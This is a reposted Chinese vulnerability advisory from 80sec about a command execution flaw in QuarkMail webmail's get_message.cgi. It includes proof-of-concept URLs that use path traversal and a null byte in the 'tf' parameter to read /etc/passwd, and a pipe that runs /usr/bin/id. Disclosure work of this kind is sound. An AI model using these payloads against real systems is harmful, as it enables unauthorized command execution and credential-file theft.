首页
|
安全文章
|
安全工具
|
Exploits
|
本站原创
|
关于我们
|
网站地图
|
安全论坛
当前位置:
主页
>
安全文章
>
文章资料
>
漏洞资料
>文章内容
快客电邮(QuarkMail)远程命令执行漏洞
来源:http://www.80sec.com 作者:80sec 发布时间:2008-10-20
来源:80sec
漏洞说明:快客电邮(QuarkMail)是北京雄智伟业科技公司推出的电子邮件系 统,被广泛用于各个领域的电子邮件解决方案,其webmail部分使用perl cgi编写,但是80sec在其系统中发现一个重大的安全漏洞,导致远程用户可以在邮件系统上以当前进程身份执行任意命令,从而进一步控制主机或者系统。
漏洞厂商:
http://www.ipmotor.com/
漏洞解析:QuarkMail错误地使用perl的open函数以打开文件,实现模板等功能,但是其对用户传入的参数没有做有效的过滤,从而导致一个命令执行漏洞。
漏洞证明:登录进入系统之后访问如下URL
http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1
&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../ etc/passwd%00&id=2&sort=0&read_flag=yes即可得到系统账户文件,访问如下URL
http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1
&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../usr/bin/id|%00&id=2&sort=0&read_flag=yes即可以将/usr/bin/id文件打开执行,并且将结果返回,用户就可以利用一序列操作获得系统的完整访问权。
漏洞解决:请等待官方补丁。
[
推荐
] [
评论(0条)
]
[返回顶部]
[打印本页]
[关闭窗口]
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
§最新评论:
热点文章
·
XSOK环境变量本地命令执行漏洞
·
N点虚拟主机管理系统 致命漏洞。
·
南方数据企业网站管理系统V10.0
·
动网(DVBBS)Version 8.2.0 后
·
Solaris 10 telnet漏洞及解决
·
破解无线路由器密码,常见无线密
·
Nginx %00空字节执行php漏洞
·
WinWebMail、7I24提权漏洞
·
XPCD xpcd-svga本地缓冲区溢出漏
·
Struts2多个漏洞简要分析
·
ecshop2.72 api.php 文件鸡肋注
·
Discuz!后台拿Webshell 0day
相关文章
·
利用MS08-058攻击Google
·
oblog4.6添加后台管理员漏洞(仅
·
Discuz! [flash] xss bug
·
自由动力(My Power)3.6 sp2的注
·
世界之窗(The World)浏览器地址
·
Discuz! admincp.php xss bug
·
Discuz! flash csrf vul
·
Discuz!4.x wap\index.php 变量
·
Discuz! 数据库错误信息xss bug
·
Discuz! trade.php 数据库'注射'
·
Discuz! moderation.inc.php 数
·
PHP168 下载任意文件漏洞
推荐广告
CopyRight © 2002-2022
VFocuS.Net
All Rights Reserved